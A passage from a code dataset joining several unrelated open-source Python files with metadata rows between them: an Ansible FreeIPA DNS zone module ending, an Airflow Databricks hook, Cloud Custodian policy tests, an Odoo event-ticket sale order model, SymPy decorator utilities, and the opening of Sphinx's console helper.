else:
if ipa_dnszone:
changed = True
if not module.check_mode:
client.dnszone_del(zone_name=zone_name)
return changed, client.dnszone_find(zone_name)
def main():
module = AnsibleModule(
argument_spec=dict(
zone_name=dict(type='str', required=True),
ipa_prot=dict(
type='str',
default='https',
choices=['http', 'https']
),
ipa_host=dict(
type='str',
default='localhost'
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
),
ipa_port=dict(type='int', default=443),
ipa_user=dict(type='str', default='admin'),
ipa_pass=dict(type='str', required=True, no_log=True),
validate_certs=dict(type='bool', default=True),
),
supports_check_mode=True,
)
client = DNSZoneIPAClient(
module=module,
host=module.params['ipa_host'],
port=module.params['ipa_port'],
protocol=module.params['ipa_prot']
)
try:
client.login(
username=module.params['ipa_user'],
password=module.params['ipa_pass']
)
changed, zone = ensure(module, client)
module.exit_json(changed=changed, zone=zone)
except Exception as e:
module.fail_json(msg=to_native(e))
if __name__ == '__main__':
main()
| gpl-3.0 | 729,071,680,670,470,300 | 26.401099 | 103 | 0.602767 | false |
mrares/incubator-airflow | airflow/contrib/hooks/databricks_hook.py | 16 | 8287 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import requests
from airflow import __version__
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
from requests import exceptions as requests_exceptions
from requests.auth import AuthBase
from airflow.utils.log.logging_mixin import LoggingMixin
try:
from urllib import parse as urlparse
except ImportError:
import urlparse
SUBMIT_RUN_ENDPOINT = ('POST', 'api/2.0/jobs/runs/submit')
GET_RUN_ENDPOINT = ('GET', 'api/2.0/jobs/runs/get')
CANCEL_RUN_ENDPOINT = ('POST', 'api/2.0/jobs/runs/cancel')
USER_AGENT_HEADER = {'user-agent': 'airflow-{v}'.format(v=__version__)}
class DatabricksHook(BaseHook, LoggingMixin):
"""
Interact with Databricks.
"""
def __init__(
self,
databricks_conn_id='databricks_default',
timeout_seconds=180,
retry_limit=3):
"""
:param databricks_conn_id: The name of the databricks connection to use.
:type databricks_conn_id: string
:param timeout_seconds: The amount of time in seconds the requests library
will wait before timing-out.
:type timeout_seconds: int
:param retry_limit: The number of times to retry the connection in case of
service outages.
:type retry_limit: int
"""
self.databricks_conn_id = databricks_conn_id
self.databricks_conn = self.get_connection(databricks_conn_id)
self.timeout_seconds = timeout_seconds
assert retry_limit >= 1, 'Retry limit must be greater than equal to 1'
self.retry_limit = retry_limit
def _parse_host(self, host):
"""
The purpose of this function is to be robust to improper connections
settings provided by users, specifically in the host field.
For example -- when users supply ``https://xx.cloud.databricks.com`` as the
host, we must strip out the protocol to get the host.
>>> h = DatabricksHook()
>>> assert h._parse_host('https://xx.cloud.databricks.com') == \
'xx.cloud.databricks.com'
In the case where users supply the correct ``xx.cloud.databricks.com`` as the
host, this function is a no-op.
>>> assert h._parse_host('xx.cloud.databricks.com') == 'xx.cloud.databricks.com'
"""
urlparse_host = urlparse.urlparse(host).hostname
if urlparse_host:
# In this case, host = https://xx.cloud.databricks.com
return urlparse_host
else:
# In this case, host = xx.cloud.databricks.com
return host
def _do_api_call(self, endpoint_info, json):
"""
Utility function to perform an API call with retries
:param endpoint_info: Tuple of method and endpoint
:type endpoint_info: (string, string)
:param json: Parameters for this API call.
:type json: dict
:return: If the api call returns a OK status code,
this function returns the response in JSON. Otherwise,
we throw an AirflowException.
:rtype: dict
"""
method, endpoint = endpoint_info
url = 'https://{host}/{endpoint}'.format(
host=self._parse_host(self.databricks_conn.host),
endpoint=endpoint)
if 'token' in self.databricks_conn.extra_dejson:
self.log.info('Using token auth.')
auth = _TokenAuth(self.databricks_conn.extra_dejson['token'])
else:
self.log.info('Using basic auth.')
auth = (self.databricks_conn.login, self.databricks_conn.password)
if method == 'GET':
request_func = requests.get
elif method == 'POST':
request_func = requests.post
else:
raise AirflowException('Unexpected HTTP Method: ' + method)
for attempt_num in range(1, self.retry_limit+1):
try:
response = request_func(
url,
json=json,
auth=auth,
headers=USER_AGENT_HEADER,
timeout=self.timeout_seconds)
if response.status_code == requests.codes.ok:
return response.json()
else:
# In this case, the user probably made a mistake.
# Don't retry.
raise AirflowException('Response: {0}, Status Code: {1}'.format(
response.content, response.status_code))
except (requests_exceptions.ConnectionError,
requests_exceptions.Timeout) as e:
self.log.error(
'Attempt %s API Request to Databricks failed with reason: %s',
attempt_num, e
)
raise AirflowException(('API requests to Databricks failed {} times. ' +
'Giving up.').format(self.retry_limit))
def submit_run(self, json):
"""
Utility function to call the ``api/2.0/jobs/runs/submit`` endpoint.
:param json: The data used in the body of the request to the ``submit`` endpoint.
:type json: dict
:return: the run_id as a string
:rtype: string
"""
response = self._do_api_call(SUBMIT_RUN_ENDPOINT, json)
return response['run_id']
def get_run_page_url(self, run_id):
json = {'run_id': run_id}
response = self._do_api_call(GET_RUN_ENDPOINT, json)
return response['run_page_url']
def get_run_state(self, run_id):
json = {'run_id': run_id}
response = self._do_api_call(GET_RUN_ENDPOINT, json)
state = response['state']
life_cycle_state = state['life_cycle_state']
# result_state may not be in the state if not terminal
result_state = state.get('result_state', None)
state_message = state['state_message']
return RunState(life_cycle_state, result_state, state_message)
def cancel_run(self, run_id):
json = {'run_id': run_id}
self._do_api_call(CANCEL_RUN_ENDPOINT, json)
RUN_LIFE_CYCLE_STATES = [
'PENDING',
'RUNNING',
'TERMINATING',
'TERMINATED',
'SKIPPED',
'INTERNAL_ERROR'
]
class RunState:
"""
Utility class for the run state concept of Databricks runs.
"""
def __init__(self, life_cycle_state, result_state, state_message):
self.life_cycle_state = life_cycle_state
self.result_state = result_state
self.state_message = state_message
@property
def is_terminal(self):
if self.life_cycle_state not in RUN_LIFE_CYCLE_STATES:
raise AirflowException(('Unexpected life cycle state: {}: If the state has '
'been introduced recently, please check the Databricks user '
'guide for troubleshooting information').format(
self.life_cycle_state))
return self.life_cycle_state in ('TERMINATED', 'SKIPPED', 'INTERNAL_ERROR')
@property
def is_successful(self):
return self.result_state == 'SUCCESS'
def __eq__(self, other):
return self.life_cycle_state == other.life_cycle_state and \
self.result_state == other.result_state and \
self.state_message == other.state_message
def __repr__(self):
return str(self.__dict__)
class _TokenAuth(AuthBase):
"""
Helper class for requests Auth field. AuthBase requires you to implement the __call__
magic function.
"""
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = 'Bearer ' + self.token
return r
| apache-2.0 | 1,151,514,850,815,017,200 | 36.328829 | 89 | 0.603596 | false |
scotwk/cloud-custodian | tests/test_policy.py | 2 | 21345 | # Copyright 2015-2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
from datetime import datetime, timedelta
import json
import mock
import shutil
import tempfile
from c7n import policy, manager
from c7n.resources.ec2 import EC2
from c7n.utils import dumps
from c7n.query import ConfigSource
from .common import BaseTest, Config, Bag, event_data
class DummyResource(manager.ResourceManager):
def resources(self):
return [
{'abc': 123},
{'def': 456}]
@property
def actions(self):
class _a(object):
def name(self):
return self.f.__name__
def __init__(self, f):
self.f = f
def process(self, resources):
return self.f(resources)
def p1(resources):
return [
{'abc': 456},
{'def': 321}]
def p2(resources):
return resources
return [_a(p1), _a(p2)]
class PolicyPermissions(BaseTest):
def test_policy_detail_spec_permissions(self):
policy = self.load_policy({
'name': 'kinesis-delete',
'resource': 'kinesis',
'actions': ['delete']})
perms = policy.get_permissions()
self.assertEqual(
perms,
set(('kinesis:DescribeStream',
'kinesis:ListStreams',
'kinesis:DeleteStream')))
def test_policy_manager_custom_permissions(self):
policy = self.load_policy({
'name': 'ec2-utilization',
'resource': 'ec2',
'filters': [
{'type': 'metrics',
'name': 'CPUUtilization',
'days': 3,
'value': 1.5}
]})
perms = policy.get_permissions()
self.assertEqual(
perms,
set(('ec2:DescribeInstances',
'ec2:DescribeTags',
'cloudwatch:GetMetricStatistics')))
def xtest_resource_filter_name(self):
# resources without a filter name won't play nice in
# lambda policies
missing = []
marker = object
for k, v in manager.resources.items():
if getattr(v.resource_type, 'filter_name', marker) is marker:
missing.append(k)
if missing:
self.fail("Missing filter name %s" % (', '.join(missing)))
def test_resource_augment_universal_mask(self):
# universal tag had a potential bad patterm of masking
# resource augmentation, scan resources to ensure
for k, v in manager.resources.items():
if not getattr(v.resource_type, 'universal_taggable', None):
continue
if v.augment.__name__ == 'universal_augment' and getattr(
v.resource_type, 'detail_spec', None):
self.fail(
"%s resource has universal augment masking resource augment" % k)
def test_resource_shadow_source_augment(self):
shadowed = []
bad = []
cfg = Config.empty()
for k, v in manager.resources.items():
if not getattr(v.resource_type, 'config_type', None):
continue
p = Bag({'name': 'permcheck', 'resource': k})
ctx = self.get_context(config=cfg, policy=p)
mgr = v(ctx, p)
source = mgr.get_source('config')
if not isinstance(source, ConfigSource):
bad.append(k)
if v.__dict__.get('augment'):
shadowed.append(k)
if shadowed:
self.fail(
"%s have resource managers shadowing source augments" % (
", ".join(shadowed)))
if bad:
self.fail(
"%s have config types but no config source" % (
", ".join(bad)))
def test_resource_permissions(self):
self.capture_logging('c7n.cache')
missing = []
cfg = Config.empty()
for k, v in manager.resources.items():
p = Bag({'name': 'permcheck', 'resource': k})
ctx = self.get_context(config=cfg, policy=p)
mgr = v(ctx, p)
perms = mgr.get_permissions()
if not perms:
missing.append(k)
for n, a in v.action_registry.items():
p['actions'] = [n]
perms = a({}, mgr).get_permissions()
found = bool(perms)
if not isinstance(perms, (list, tuple, set)):
found = False
if not found:
missing.append("%s.actions.%s" % (
k, n))
for n, f in v.filter_registry.items():
if n in ('and', 'or', 'not'):
continue
p['filters'] = [n]
perms = f({}, mgr).get_permissions()
if not isinstance(perms, (tuple, list, set)):
missing.append("%s.filters.%s" % (
k, n))
# in memory filters
if n in ('event', 'value', 'tag-count',
'marked-for-op', 'offhour', 'onhour', 'age',
'state-age', 'egress', 'ingress',
'capacity-delta', 'is-ssl', 'global-grants',
'missing-policy-statement', 'missing-statement',
'healthcheck-protocol-mismatch', 'image-age',
'has-statement', 'no-access',
'instance-age', 'ephemeral', 'instance-uptime'):
continue
qk = "%s.filters.%s" % (k, n)
if qk in ('route-table.filters.route',):
continue
if not perms:
missing.append(qk)
if missing:
self.fail("Missing permissions %d on \n\t%s" % (
len(missing),
"\n\t".join(sorted(missing))))
class TestPolicyCollection(BaseTest):
def test_expand_partitions(self):
cfg = Config.empty(
regions=['us-gov-west-1', 'cn-north-1', 'us-west-2'])
original = policy.PolicyCollection.from_data(
{'policies': [
{'name': 'foo',
'resource': 'ec2'}]},
cfg)
collection = original.expand_regions(cfg.regions)
self.assertEqual(
sorted([p.options.region for p in collection]),
['cn-north-1', 'us-gov-west-1', 'us-west-2'])
def test_policy_account_expand(self):
original = policy.PolicyCollection.from_data(
{'policies': [
{'name': 'foo',
'resource': 'account'}]},
Config.empty(regions=['us-east-1', 'us-west-2']))
collection = original.expand_regions(['all'])
self.assertEqual(len(collection), 1)
def test_policy_region_expand_global(self):
original = policy.PolicyCollection.from_data(
{'policies': [
{'name': 'foo',
'resource': 's3'},
{'name': 'iam',
'resource': 'iam-user'}]},
Config.empty(regions=['us-east-1', 'us-west-2']))
collection = original.expand_regions(['all'])
self.assertEqual(len(collection.resource_types), 2)
s3_regions = [p.options.region for p in collection if p.resource_type == 's3']
self.assertTrue('us-east-1' in s3_regions)
self.assertTrue('us-east-2' in s3_regions)
iam = [p for p in collection if p.resource_type == 'iam-user']
self.assertEqual(len(iam), 1)
self.assertEqual(iam[0].options.region, 'us-east-1')
collection = original.expand_regions(['eu-west-1', 'eu-west-2'])
iam = [p for p in collection if p.resource_type == 'iam-user']
self.assertEqual(len(iam), 1)
self.assertEqual(iam[0].options.region, 'eu-west-1')
self.assertEqual(len(collection), 3)
class TestPolicy(BaseTest):
def test_child_resource_trail_validation(self):
self.assertRaises(
ValueError,
self.load_policy,
{'name': 'api-resources',
'resource': 'rest-resource',
'mode': {
'type': 'cloudtrail',
'events': [
{'source': 'apigateway.amazonaws.com',
'event': 'UpdateResource',
'ids': 'requestParameter.stageName'}]}})
def test_load_policy_validation_error(self):
invalid_policies = {
'policies':
[{
'name': 'foo',
'resource': 's3',
'filters': [{"tag:custodian_tagging": "not-null"}],
'actions': [{'type': 'untag',
'tags': {'custodian_cleanup': 'yes'}}],
}]
}
self.assertRaises(Exception, self.load_policy_set, invalid_policies)
def test_policy_validation(self):
policy = self.load_policy({
'name': 'ec2-utilization',
'resource': 'ec2',
'tags': ['abc'],
'filters': [
{'type': 'metrics',
'name': 'CPUUtilization',
'days': 3,
'value': 1.5}],
'actions': ['stop']})
policy.validate()
self.assertEqual(policy.tags, ['abc'])
self.assertFalse(policy.is_lambda)
self.assertTrue(
repr(policy).startswith(
"<Policy resource: ec2 name: ec2-utilization"))
def test_policy_name_filtering(self):
collection = self.load_policy_set(
{'policies': [
{'name': 's3-remediate',
'resource': 's3'},
{'name': 's3-global-grants',
'resource': 's3'},
{'name': 'ec2-tag-compliance-stop',
'resource': 'ec2'},
{'name': 'ec2-tag-compliance-kill',
'resource': 'ec2'},
{'name': 'ec2-tag-compliance-remove',
'resource': 'ec2'}]},
)
self.assertIn('s3-remediate', collection)
self.assertNotIn('s3-argle-bargle', collection)
# Make sure __iter__ works
for p in collection:
self.assertTrue(p.name is not None)
self.assertEqual(collection.resource_types, set(('s3', 'ec2')))
self.assertTrue('s3-remediate' in collection)
self.assertEqual(
[p.name for p in collection.filter('s3*')],
['s3-remediate', 's3-global-grants'])
self.assertEqual(
[p.name for p in collection.filter('ec2*')],
['ec2-tag-compliance-stop',
'ec2-tag-compliance-kill',
'ec2-tag-compliance-remove'])
def test_file_not_found(self):
self.assertRaises(
IOError, policy.load, Config.empty(), "/asdf12")
def test_lambda_policy_metrics(self):
session_factory = self.replay_flight_data('test_lambda_policy_metrics')
p = self.load_policy({
'name': 'ec2-tag-compliance-v6',
'resource': 'ec2',
'mode': {
'type': 'ec2-instance-state',
'events': ['running']},
'filters': [
{"tag:custodian_status": 'absent'},
{'or': [
{"tag:App": 'absent'},
{"tag:Env": 'absent'},
{"tag:Owner": 'absent'}]}]},
session_factory=session_factory)
end = datetime.utcnow()
start = end - timedelta(14)
period = 24 * 60 * 60 * 14
self.assertEqual(
json.loads(dumps(p.get_metrics(start, end, period), indent=2)),
{u'Durations': [],
u'Errors': [{u'Sum': 0.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}],
u'Invocations': [{u'Sum': 4.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}],
u'ResourceCount': [{u'Average': 1.0,
u'Sum': 2.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}],
u'Throttles': [{u'Sum': 0.0,
u'Timestamp': u'2016-05-30T10:50:00+00:00',
u'Unit': u'Count'}]})
def test_policy_metrics(self):
session_factory = self.replay_flight_data('test_policy_metrics')
p = self.load_policy(
{'name': 's3-encrypt-keys',
'resource': 's3',
'actions': [
{'type': 'encrypt-keys'}]},
session_factory=session_factory)
end = datetime.now().replace(hour=0, minute=0, microsecond=0)
start = end - timedelta(14)
period = 24 * 60 * 60 * 14
self.maxDiff = None
self.assertEqual(
json.loads(dumps(p.get_metrics(start, end, period), indent=2)),
{
"ActionTime": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 8541.752702140668,
"Sum": 128126.29053211001,
"Unit": "Seconds"
}
],
"Total Keys": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 1575708.7333333334,
"Sum": 23635631.0,
"Unit": "Count"
}
],
"ResourceTime": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 8.682969363532667,
"Sum": 130.24454045299,
"Unit": "Seconds"
}
],
"ResourceCount": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 23.6,
"Sum": 354.0,
"Unit": "Count"
}
],
"Unencrypted": [
{
"Timestamp": "2016-05-30T00:00:00+00:00",
"Average": 10942.266666666666,
"Sum": 164134.0,
"Unit": "Count"
}
]})
def test_get_resource_manager(self):
collection = self.load_policy_set(
{'policies': [
{'name': 'query-instances',
'resource': 'ec2',
'filters': [
{'tag-key': 'CMDBEnvironment'}
]}]})
p = collection.policies[0]
self.assertTrue(
isinstance(p.get_resource_manager(), EC2))
def test_get_logs_from_group(self):
p_data = {
'name': 'related-rds-test',
'resource': 'rds',
'filters': [
{
'key': 'GroupName',
'type': 'security-group',
'value': 'default',
},
],
'actions': [{'days': 10, 'type': 'retention'}],
}
session_factory = self.replay_flight_data('test_logs_from_group')
config = {'log_group': 'test-logs'}
policy = self.load_policy(p_data, config, session_factory)
logs = list(
policy.get_logs('2016-11-01 00:00:00', '2016-11-30 11:59:59')
)
self.assertEqual(len(logs), 6)
# entries look reasonable
entry = logs[1]
self.assertIn('timestamp', entry)
self.assertIn('message', entry)
# none in range
logs = list(
policy.get_logs('2016-10-01 00:00:00', '2016-10-31 11:59:59')
)
self.assertEqual(len(logs), 0)
def xtest_policy_run(self):
manager.resources.register('dummy', DummyResource)
self.addCleanup(manager.resources.unregister, 'dummy')
self.output_dir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, self.output_dir)
collection = self.load_policy_set(
{'policies': [
{'name': 'process-instances',
'resource': 'dummy'}]},
{'output_dir': self.output_dir})
p = collection.policies[0]
p()
self.assertEqual(len(p.ctx.metrics.data), 3)
class PolicyExecutionModeTest(BaseTest):
def test_run_unimplemented(self):
self.assertRaises(NotImplementedError,
policy.PolicyExecutionMode({}).run)
def test_get_logs_unimplemented(self):
self.assertRaises(NotImplementedError,
policy.PolicyExecutionMode({}).get_logs, 1, 2)
class PullModeTest(BaseTest):
def test_skip_when_region_not_equal(self):
log_file = self.capture_logging('custodian.policy')
policy_name = 'rds-test-policy'
p = self.load_policy(
{'name': policy_name,
'resource': 'rds',
'region': 'us-east-1',
'filters': [
{'type': 'default-vpc'}]},
config={'region': 'us-west-2'},
session_factory=None)
p.run()
lines = log_file.getvalue().strip().split('\n')
self.assertIn(
"Skipping policy {} target-region: us-east-1 current-region: us-west-2".format(policy_name),
lines)
class GuardModeTest(BaseTest):
def test_unsupported_resource(self):
self.assertRaises(
ValueError,
self.load_policy,
{'name': 'vpc',
'resource': 'vpc',
'mode': {'type': 'guard-duty'}},
validate=True)
@mock.patch('c7n.mu.LambdaManager.publish')
def test_ec2_guard_event_pattern(self, publish):
def assert_publish(policy_lambda, alias, role):
events = policy_lambda.get_events(mock.MagicMock())
self.assertEqual(len(events), 1)
pattern = json.loads(events[0].render_event_pattern())
expected = {"source": ["aws.guardduty"],
"detail": {"resource": {"resourceType": ["Instance"]}},
"detail-type": ["GuardDuty Finding"]}
self.assertEqual(pattern, expected)
publish.side_effect = assert_publish
p = self.load_policy(
{'name': 'ec2-instance-guard',
'resource': 'ec2',
'mode': {'type': 'guard-duty'}})
p.run()
@mock.patch('c7n.mu.LambdaManager.publish')
def test_iam_guard_event_pattern(self, publish):
def assert_publish(policy_lambda, alias, role):
events = policy_lambda.get_events(mock.MagicMock())
self.assertEqual(len(events), 1)
pattern = json.loads(events[0].render_event_pattern())
expected = {"source": ["aws.guardduty"],
"detail": {"resource": {"resourceType": ["AccessKey"]}},
"detail-type": ["GuardDuty Finding"]}
self.assertEqual(pattern, expected)
publish.side_effect = assert_publish
p = self.load_policy(
{'name': 'iam-user-guard',
'resource': 'iam-user',
'mode': {'type': 'guard-duty'}})
p.run()
@mock.patch('c7n.query.QueryResourceManager.get_resources')
def test_ec2_instance_guard(self, get_resources):
def instances(ids, cache=False):
return [{'InstanceId': ids[0]}]
get_resources.side_effect = instances
p = self.load_policy(
{'name': 'ec2-instance-guard',
'resource': 'ec2',
'mode': {'type': 'guard-duty'}})
event = event_data('ec2-duty-event.json')
results = p.push(event, None)
self.assertEqual(results, [{'InstanceId': 'i-99999999'}])
@mock.patch('c7n.query.QueryResourceManager.get_resources')
def test_iam_user_access_key_annotate(self, get_resources):
def users(ids, cache=False):
return [{'UserName': ids[0]}]
get_resources.side_effect = users
p = self.load_policy(
{'name': 'user-key-guard',
'resource': 'iam-user',
'mode': {'type': 'guard-duty'}})
event = event_data('iam-duty-event.json')
results = p.push(event, None)
self.assertEqual(results, [{
u'UserName': u'GeneratedFindingUserName',
u'c7n:AccessKeys': {u'AccessKeyId': u'GeneratedFindingAccessKeyId'}}])
| apache-2.0 | 2,344,467,737,883,790,300 | 34.39801 | 104 | 0.495573 | false |
akhmadMizkat/odoo | addons/website_event_sale/models/sale_order.py | 1 | 5121 | # -*- coding: utf-8 -*-
from openerp import SUPERUSER_ID, api
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.exceptions import UserError
class sale_order(osv.Model):
_inherit = "sale.order"
@api.multi
def _cart_find_product_line(self, product_id=None, line_id=None, **kwargs):
self.ensure_one()
lines = super(sale_order, self)._cart_find_product_line(product_id, line_id)
if line_id:
return lines
if self.env.context.get("event_ticket_id"):
lines = lines.filtered(lambda line: line.event_ticket_id.id == self.env.context["event_ticket_id"])
return lines
def _website_product_id_change(self, cr, uid, ids, order_id, product_id, qty=0, context=None):
values = super(sale_order, self)._website_product_id_change(cr, uid, ids, order_id, product_id, qty=qty, context=None)
event_ticket_id = None
if context.get("event_ticket_id"):
event_ticket_id = context.get("event_ticket_id")
else:
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
if product.event_ticket_ids:
event_ticket_id = product.event_ticket_ids[0].id
if event_ticket_id:
order = self.pool['sale.order'].browse(cr, SUPERUSER_ID, order_id, context=context)
ticket = self.pool.get('event.event.ticket').browse(cr, uid, event_ticket_id, context=dict(context, pricelist=order.pricelist_id.id))
if product_id != ticket.product_id.id:
raise UserError(_("The ticket doesn't match with this product."))
values['product_id'] = ticket.product_id.id
values['event_id'] = ticket.event_id.id
values['event_ticket_id'] = ticket.id
values['price_unit'] = ticket.price_reduce or ticket.price
values['name'] = "%s\n%s" % (ticket.event_id.display_name, ticket.name)
# avoid writing related values that end up locking the product record
values.pop('event_type_id', None)
values.pop('event_ok', None)
return values
def _cart_update(self, cr, uid, ids, product_id=None, line_id=None, add_qty=0, set_qty=0, context=None, **kwargs):
OrderLine = self.pool['sale.order.line']
Attendee = self.pool['event.registration']
Ticket = self.pool['event.event.ticket']
if line_id:
line = OrderLine.browse(cr, uid, line_id, context=context)
ticket = line.event_ticket_id
old_qty = int(line.product_uom_qty)
context = dict(context, event_ticket_id=ticket.id)
else:
line, ticket = None, None
ticket_ids = Ticket.search(cr, uid, [('product_id', '=', product_id)], limit=1, context=context)
if ticket_ids:
ticket = Ticket.browse(cr, uid, ticket_ids[0], context=context)
old_qty = 0
new_qty = set_qty if set_qty else (add_qty or 0 + old_qty)
# case: buying tickets for a sold out ticket
values = {}
if ticket and ticket.seats_availability == 'limited' and ticket.seats_available <= 0:
values['warning'] = _('Sorry, The %(ticket)s tickets for the %(event)s event are sold out.') % {
'ticket': ticket.name,
'event': ticket.event_id.name}
new_qty, set_qty, add_qty = 0, 0, 0
# case: buying tickets, too much attendees
elif ticket and ticket.seats_availability == 'limited' and new_qty > ticket.seats_available:
values['warning'] = _('Sorry, only %(remaining_seats)d seats are still available for the %(ticket)s ticket for the %(event)s event.') % {
'remaining_seats': ticket.seats_available,
'ticket': ticket.name,
'event': ticket.event_id.name}
new_qty, set_qty, add_qty = ticket.seats_available, ticket.seats_available, 0
values.update(super(sale_order, self)._cart_update(
cr, uid, ids, product_id, line_id, add_qty, set_qty, context, **kwargs))
# removing attendees
if ticket and new_qty < old_qty:
attendees = Attendee.search(
cr, uid, [
('state', '!=', 'cancel'),
('sale_order_id', '=', ids[0]),
('event_ticket_id', '=', ticket.id)
], offset=new_qty, limit=(old_qty-new_qty),
order='create_date asc', context=context)
Attendee.button_reg_cancel(cr, uid, attendees, context=context)
# adding attendees
elif ticket and new_qty > old_qty:
line = OrderLine.browse(cr, uid, values['line_id'], context=context)
line._update_registrations(confirm=False, registration_data=kwargs.get('registration_data', []))
# add in return values the registrations, to display them on website (or not)
values['attendee_ids'] = Attendee.search(cr, uid, [('sale_order_line_id', '=', line.id), ('state', '!=', 'cancel')], context=context)
return values
| gpl-3.0 | 4,871,151,628,124,415,000 | 48.718447 | 149 | 0.59422 | false |
jaimahajan1997/sympy | sympy/utilities/decorator.py | 17 | 6353 | """Useful utility decorators. """
from __future__ import print_function, division
import sys
import types
import inspect
from functools import update_wrapper
from sympy.core.decorators import wraps
from sympy.core.compatibility import class_types, get_function_globals, get_function_name, iterable
def threaded_factory(func, use_add):
"""A factory for ``threaded`` decorators. """
from sympy.core import sympify
from sympy.matrices import MatrixBase
@wraps(func)
def threaded_func(expr, *args, **kwargs):
if isinstance(expr, MatrixBase):
return expr.applyfunc(lambda f: func(f, *args, **kwargs))
elif iterable(expr):
try:
return expr.__class__([func(f, *args, **kwargs) for f in expr])
except TypeError:
return expr
else:
expr = sympify(expr)
if use_add and expr.is_Add:
return expr.__class__(*[ func(f, *args, **kwargs) for f in expr.args ])
elif expr.is_Relational:
return expr.__class__(func(expr.lhs, *args, **kwargs),
func(expr.rhs, *args, **kwargs))
else:
return func(expr, *args, **kwargs)
return threaded_func
def threaded(func):
"""Apply ``func`` to sub--elements of an object, including :class:`Add`.
This decorator is intended to make it uniformly possible to apply a
function to all elements of composite objects, e.g. matrices, lists, tuples
and other iterable containers, or just expressions.
This version of :func:`threaded` decorator allows threading over
elements of :class:`Add` class. If this behavior is not desirable
use :func:`xthreaded` decorator.
Functions using this decorator must have the following signature::
@threaded
def function(expr, *args, **kwargs):
"""
return threaded_factory(func, True)
def xthreaded(func):
"""Apply ``func`` to sub--elements of an object, excluding :class:`Add`.
This decorator is intended to make it uniformly possible to apply a
function to all elements of composite objects, e.g. matrices, lists, tuples
and other iterable containers, or just expressions.
This version of :func:`threaded` decorator disallows threading over
elements of :class:`Add` class. If this behavior is not desirable
use :func:`threaded` decorator.
Functions using this decorator must have the following signature::
@xthreaded
def function(expr, *args, **kwargs):
"""
return threaded_factory(func, False)
def conserve_mpmath_dps(func):
"""After the function finishes, resets the value of mpmath.mp.dps to
the value it had before the function was run."""
import functools
import mpmath
def func_wrapper(*args, **kwargs):
dps = mpmath.mp.dps
try:
return func(*args, **kwargs)
finally:
mpmath.mp.dps = dps
func_wrapper = functools.update_wrapper(func_wrapper, func)
return func_wrapper
class no_attrs_in_subclass(object):
"""Don't 'inherit' certain attributes from a base class
>>> from sympy.utilities.decorator import no_attrs_in_subclass
>>> class A(object):
... x = 'test'
>>> A.x = no_attrs_in_subclass(A, A.x)
>>> class B(A):
... pass
>>> hasattr(A, 'x')
True
>>> hasattr(B, 'x')
False
"""
def __init__(self, cls, f):
self.cls = cls
self.f = f
def __get__(self, instance, owner=None):
if owner == self.cls:
if hasattr(self.f, '__get__'):
return self.f.__get__(instance, owner)
return self.f
raise AttributeError
def doctest_depends_on(exe=None, modules=None, disable_viewers=None):
"""Adds metadata about the depenencies which need to be met for doctesting
the docstrings of the decorated objects."""
pyglet = False
if modules is not None and 'pyglet' in modules:
pyglet = True
def depends_on_deco(fn):
fn._doctest_depends_on = dict(exe=exe, modules=modules,
disable_viewers=disable_viewers,
pyglet=pyglet)
# once we drop py2.5 support and use class decorators this evaluates
# to True
if inspect.isclass(fn):
fn._doctest_depdends_on = no_attrs_in_subclass(fn, fn._doctest_depends_on)
return fn
return depends_on_deco
def public(obj):
"""
Append ``obj``'s name to global ``__all__`` variable (call site).
By using this decorator on functions or classes you achieve the same goal
as by filling ``__all__`` variables manually, you just don't have to repeat
yourself (object's name). You also know if object is public at definition
site, not at some random location (where ``__all__`` was set).
Note that in multiple decorator setup (in almost all cases) ``@public``
decorator must be applied before any other decorators, because it relies
on the pointer to object's global namespace. If you apply other decorators
first, ``@public`` may end up modifying the wrong namespace.
Examples
========
>>> from sympy.utilities.decorator import public
>>> __all__
Traceback (most recent call last):
...
NameError: name '__all__' is not defined
>>> @public
... def some_function():
... pass
>>> __all__
['some_function']
"""
if isinstance(obj, types.FunctionType):
ns = get_function_globals(obj)
name = get_function_name(obj)
elif isinstance(obj, (type(type), class_types)):
ns = sys.modules[obj.__module__].__dict__
name = obj.__name__
else:
raise TypeError("expected a function or a class, got %s" % obj)
if "__all__" not in ns:
ns["__all__"] = [name]
else:
ns["__all__"].append(name)
return obj
def memoize_property(storage):
"""Create a property, where the lookup is stored in ``storage``"""
def decorator(method):
name = method.__name__
def wrapper(self):
if name not in storage:
storage[name] = method(self)
return storage[name]
return property(update_wrapper(wrapper, method))
return decorator
| bsd-3-clause | -3,076,124,693,571,021,300 | 29.690821 | 99 | 0.614513 | false |
SnappleCap/oh-mainline | vendor/packages/sphinx/sphinx/util/console.py | 16 | 2430 | # -*- coding: utf-8 -*-
"""
sphinx.util.console
~~~~~~~~~~~~~~~~~~~
Format colored console output.
:copyright: Copyright 2007-2013 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import os
import sys
import re
_ansi_re = re.compile('\x1b\\[(\\d\\d;){0,2}\\d\\dm')
codes = {}
def get_terminal_width():
"""Borrowed from the py lib."""
